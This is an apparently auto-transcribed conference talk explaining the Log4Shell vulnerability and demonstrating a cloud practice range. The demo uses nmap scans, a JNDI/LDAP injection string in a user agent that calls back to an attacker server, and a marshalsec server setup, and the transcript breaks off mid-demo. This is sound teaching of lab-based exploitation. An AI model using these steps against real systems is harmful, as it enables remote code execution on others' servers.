A Log4Shell Practice Exploitation Range in the Cloud

for my next trick I'll make this 2011 MacBook stay connected to the projector for the entire presentation uh welcome uh thank you for coming the the title of this discussion is log for Shell exploitation and Cloud range um you've probably read the description but we'll go over what this is going to be about um I'm going to talk about what is log4j what was log4 shell besides something that disrupted a lot of folks uh holidays I'm going to talk about who cares about it we'll do some demonstrations with exploitation uh and then I'll talk about how the range is built that helps demonstrate this exploitation what I hope is that you'll take away an understanding of what the log for Shell vulnerability is why it exists and that you'll understand this simple quick and cheap way to set up a test exploitation range in the cloud so that you might you know the next time a more relevant vulnerability comes out be in a good spot to test out exploits against it try out all the stuff you're seeing on infosec Twitter easily and quickly but first um why uh why should you care about what I'm saying uh hopefully you're interested in it but if not uh uh well just leave um well you're you all stayed I appreciate that my name is uh Carl sikandik again uh call sign Rosie I'm in the Air Force active duty so we have weird things like call signs just like in Top Gun you know there I was inverted uh I'm stationed here in town I've got a Bachelor's in double e a master's in computer science and I've got experience with cyber ranges I've used that term a little bit range what does that mean it's maybe a little bit more common in in the military but it's also not totally uncommon I was able to pull this this dictionary definition up it's a controlled interactive technology environment where up and coming cyber Security Professionals can learn how to detect and mitigate cyber attacks using the same kind of equipment they will have on the job so you can run a bunch of VMS in it you can test it out a lot of folks have known this as a home lab in the past typically that involves like buying a server off eBay setting it up in your basement my wife would kill me if the basement sounded like an aircraft every time she went down there and it's San Antonio so we don't have basements anyway um so I've I've been doing this kind of stuff on the cloud uh and and that terminology you know maybe you call this a cloud range or a Home range in the cloud a home lab in the cloud I'm just going to call it a range all right so again here's here's what we're gonna do uh first of all what is log for Shell uh in December 2021 this came out I think it was on a Friday and so folks had just left the office and they were probably driving home they I'm sure that they stopped they pulled over they looked at their news feed because their phone was exploding and they saw that this brand new vulnerability came out some people probably just turned right around and went back into the office and other people probably turned off their phone and pretended like they were in Bermuda uh but a little bit in more details log4 shell is a remote code execution vulnerability in in any in any application logging using the right versions of uh log 4J to libraries specifically it's got to be logging user inputs so there's there are ways to use that log4j2 library that don't log user inputs and those would not have really been vulnerable to this you got to take that user input log it log4j2 is a very popular logging framework within Java it's in all kinds of different applications as we'll see in a second and and to drill down a little bit if you're not familiar with what remote code execution means it says just about the worst type of vulnerability you can get it means that the attacker can execute any any code that they want on your computer so some some common examples from today and yesterday are ransomware key loggers where they want to steal all your passwords or maybe they just want to generate a little bit of money on the side with a cryptocurrency minor but it can be literally anything the examples that we're going to do we're just going to get a shell running a command line prompt running on the attacked computer and we're going to send that command line prompt back to us as the attacker so we could take more actions but it can be literally anything you imagine you just write a little Java code and you're you're running the root cause of this again is that the programmers trusted user input um this this goes back to a feature we'll talk about the feature in just a second it's a feature in log 4J that is able to be misused looking in the manual around the time that this vulnerability came out there's even a little note when this feature was added to log4j that you've got it programmers have got to be careful when they use it to avoid logging uh to avoid logging user input blindly so that seems to have just been ignored in a lot of cases or um you know programmers they didn't read the manual surprise so what what is log4j let's step back and talk about what is this logging framework real quick so here we've got an example where a laptop is browsing to a website on a Java on a web server written in Java so it's doing a get request and we've got the web server logging a little bit of information using this log4j Library specifically here the web server is logging the user agent string if you don't know a user agent string tells us what kind of browser the person's running it can tell us if they're on a mobile device or on a desktop or laptop or something else um it can even tell us what operating system they're running so it's very common to pull in and log those user agent strings it tells you a lot about the people that are visiting your website in this case nothing bad is happening log 4J is just seeing that user agent passing along to disk and writing it out like a happy boy well let's say you're the programmer of that web server and you want to get a little bit more complicated you want to log in addition to that user agent the version of java that your web server is running in I don't know why you would want to do this but it is a feature of log 4J that you can and so all you got to do is the web server is take that user agent string append a little bit of text dollar sign open brace Java colon version close brace and then when you pass that to log4j and you're using the most common method of logging it's going to replace that dollar sign open brace close brace bit with open jdk 11013 or whatever version of java the web server is running as maybe this is more useful in a non-web server example but this was a feature that was added to open jdk on purpose this text substitution feature it gets a little bit more uh powerful than just substituting in the version uh when you when you get to log for Shell this is a this is a great way of demonstrating that power log4j that that text substitution feature can be used to run code and if if the user was not allowed to submit the code that's running this might be a useful feature in some use case but unfortunately it's it's very commonly misused and thus we get log for shelf vulnerability so in this case here's here's a malicious user now on the laptop you and me are sitting on this laptop and we're going to give this web server a bad day uh We've replaced the user agent string we've replaced your typical user agent string with uh dollar sign open brace jndi colon ldap colon slash attacker server blah blah blah who who that in the in the back row can you guys see that awesome uh in a little bit the reason I ask is in a little bit we're going to do some demos on the keyboard um that's kind of the more interesting piece I think I made the text big enough that everyone can see but if not then please just scoot on forward So Okay so we've replaced your typical user agent string with this malicious one now the web server gets it it it tries to log that user agent still and when log4j gets that malicious user agent string the first thing it does is it says oh I need to uh I need to go out to a jndi server speak in this this little bit of ldap jndi protocol and I need to ask it where to get some code from so it makes a connection out to the attacker's server it calls out to that jndi ldap server and it asks hey where where is this little bit of code named in this case log 4J callback you can call it whatever you want and then the jndi ldap server responds hey here's a web server where you can go pick up this malicious code so that's what attacker colon 8080 is it's it's that jndi ldap server which is a specific weird language responding hey here's a web server where you can download the code so then log 4J says all right now I got my web server I'm going to go there I'm going to download this malicious code it doesn't know it's malicious I'm going to download this code and I'm going to run it so it calls out to attack our web server which is attacker colon 8080 in this case attacker web server is going to oblige and give it back log4jcallback dot class and then log4js is going to run it and that's going to pop a pop a shell and return it to the attacker in the example case so multiple stages of this attack none of them are very complicated and tooling is already built to allow all of these to happen really easy so what is affected by this vulnerability uh sisa put out a great GitHub site kind of the next day so real real quick where they started taking user input on every server that companies and people reported was vulnerable to this Minecraft if you watched YouTube there were a lot of videos of people popping Minecraft servers because it included log4j logging and it was very vulnerable elasticsearch and log stash there there are a lot of caveats to that one about its vulnerability but uh that was widely seen as as directly vulnerable to this and it's those two are embedded in a ton of other products so then all those other products that embed elasticsearch and log stash for whatever reason uh were also seen as vulnerable a number of other tools solar and Jetty are the ones that we're going to be using in the demonstration so solar is is not a product I've used before or log4 shell it's an Apache search engine it looks like something that enterprises might use and Jetty is a web server by jetbrains and it's there's a little a few uh uh caveats to its vulnerability as well but it's it's just a neat web server ghidra the nsa's reverse engineering tool was also vulnerable to this a ton of VMware products uh the solarwinds folks had another bad Christmas although certainly less bad than the year prior and and just a ton of stuff is on that list it used to be a really massive list and now they've broken it out by a b by alphabet so it's easier to browse but you can go there and check out check out the full list see if anything you've got on there is vulnerable so really is all this stuff really vulnerable well if you're running a jdk version newer than October 2018 there's an environment variable that that automatically makes this a lot more difficult to exploit it seemed like that was the recommended fix at first and then attackers played Cat and Mouse and they found some ways around that uh so then they recommend well set set this uh set this setting in the log 4J configuration log 4J is extremely configurable it's it's really nice in that way it seemed like that was a good fix for a little while but of course attackers seem to find ways around that as well and then elasticsearch the major caveat to elasticsearch is that for a few years now they've been building elasticsearch with a Java tool that um it's it's it adds a lot of automatic security features I'm not a Java programmer I'm sorry uh but but it's built in a way that disallows jndi execution and so I I've had a couple people tell me that elasticsearch is vulnerable certainly you can get those first stages of callbacks from it I haven't seen anybody actually get remote code execution on elasticsearch so feel free to if you've got a counter demo to that then please let me know I would love to see it uh and I I wouldn't I wouldn't bet on any of these as as solid protections just just update your stuff uh the the fixes are out now Okay so we've talked we've talked about log 4J we've talked about what log for Shell is we've talked about how it works but there's nothing better than trying it out for ourselves and so over the holidays I had a little time off and I spent the the evenings after my wife and daughter went to bed messing around with us uh and so if uh you know huge thanks to my wife for just ignoring all my BS around this this is just a a love a love thing uh in order to mess around with this vulnerability I set up a range that looks just like this on AWS so there's there's three computers three ec2 instances that I stood up on on AWS Cali box is running Kali Linux solar is just running Debian and then I've installed solar and Jetty and I can install any other Docker any other service that's got a Docker container associated with it on that Debian box excuse me and we could go further we could install anything we want those are both connected uh they're they're on separate subnets but uh they're connected in the same virtual private Cloud on AWS so they can talk to each other easily through something similar to network routing the only way that either of those can talk to the internet or that the internet can talk to them is through that jump host there that's run in guacamole on it that's an Apache product that gives you a uh a remote desktop interface to uh VNC remote desktop so it's just a great front end uh and in this demonstration the first thing we're going to do we're going to connect to that guacamole server running on jump host and then we'll be able to demonstrate exploitation from the Cali box across to the solar host so let's let's do that that's the fun part now this is the part where I might screw up this connection but I'm going to try really hard not to so you can't see this but the the code for all this was provided on a on a GitHub uh on a GitHub repo you can download it there's instructions so you can easily set this up and run it yourself I wrote those instructions mostly as a reminder to me in a year when it's the holidays again and of course no new vulnerabilities were at will be out and I'll want to play with them and I'll forget how to do all this but it one of the things it requires is a domain name from free DNS afraid.org those guys are fantastic and so this one is like log4jrange.lee.mx and guacamole just presents a login uh and this gets set up automatically during provisioning and and configuration so I'll go ahead and log into this I actually set this up last night uh to hopefully appease the demo Gods we'll see how well that goes it seemed to still be working a little while ago after this part we'll go through redeployment so you can see that all work but on here we've got we've got access to the solar box and we've got access to the Cali box so again this is just a regular Debian uh Debian install with a couple containers running on it when I ran pseudo Docker PS I apologize this text is a little small but but it's running essentially two Docker containers a vulnerable Jetty server which I had to create a custom container for to make it to make it vulnerable because the default install parameters of jetty are not it is not vulnerable it's just some configuration options that make it vulnerable and then install solar this is the default solar Docker container that you can you can grab from Docker Hub solar is listening on Port 89 83 and Yeti's listening on Port 80. but we don't have to know that we can switch over to our tally box awesome and uh you know if if we were the attacker all we might know is oh right there all we might know is uh kind of the network layout of of our Target organization and of course we'd know our own IP address but we see our Target organization is uh in the 10 1866 range so we can hop on over to our tally box and we can do like an nmap that's n 10 1866.star and we'll just do a kind of a ping sweep of that whole little little bit of uh of the network and see if there are any open boxes there and then we can scan there's only one only one box so we should get that one back and while we're doing that let's look at what our IP address is 10 18 225 [Music] thank you I'm going to go ahead and open a new tab once we get that back we're going to want to um port scan that box more clearly I think it's 163. I'm cheating a little bit because I again I tested this out last night to make sure it's good so we should get in another minute or so a little return here that says it's it's dot 163 that's vulnerable but if we do a port scan against dot 163 just for time we can see SSH HTTP that's going to be that Jetty web server uh and and some BNC and X11 ports are open if if this was a real server that uh VNC might be much more restricted than it is we might not be able to port scan it and X11 would be would be off limits as well so so some changes you might want to make if you're looking for a little bit more realism but here we're looking for a basic ability to demonstrate uh sorry we're looking for a basic ability to demonstrate this vulnerability so if we just go to that if we just go to that IP address directly and we look at what's on Port 80 we see it's the jetty server and if we go to that solar port 89.83 we're going to see it's solar just as as we would expect from this Cali box so that solar Port didn't show up in in the nmap scan anybody know why yep it's not in the default range exactly 89.83 is not one of the default ports nmap is going to scan if you were an attacker looking for specifically solar boxes then of of course it would be in your in your Port scanning range and if and where we own the server so we've we've got an easier time you can see here nmap was able to find that one running box on the subnet all right so so we found our Target now from the attacker station uh now we need to set up those different servers that are going to that are going to uh to get us to exploitation and um just because of cheater I've put a bunch of the commands and everything that you need to do this right into the GitHub repo so we can just go there from the Cali box it's got some information on deploying the range setting it all up it's got all this information here zoom in a little bit here it's got the the URLs on the solar server that are going to get us execution it's got the URL or uh user agent string on the jetty box that's going to give us exploitation and it's kind of got a step-by-step walkthrough of how to do this so if you remember that first server that we need is that jndi ldap server well as part of provisioning and configuring this range I download some other dude's code to do this this Marshall set guy and and I found out about this by Googling around and finding an awesome Sans tutorial on this so thank you Sans thanks thank you Marshall set guy that that information is is located this and they do a little bit more of a deep dive especially the Marshall set guy does a good Deep dive into what this protocol is and how it works so just just to demonstrate exploitation though we need to CD into this martial SEC directory and then we need to run the Java server the the jndi server that's going to get us okay so as part of this command you can see it's just executing a jar but we've got to replace this um Cali box uh IP address with what our IP address oh which is 225.8 I'm glad I checked and I screwed that up thank you 1018-225.8 so what this is going to do start up this Marshall sex server it's going to tell it anybody that's connecting asking for that the address where it can download this malicious code uh give them 1018 255.8 colon 8080 and tell them to download log 4J callback we can name it whatever we want but that's t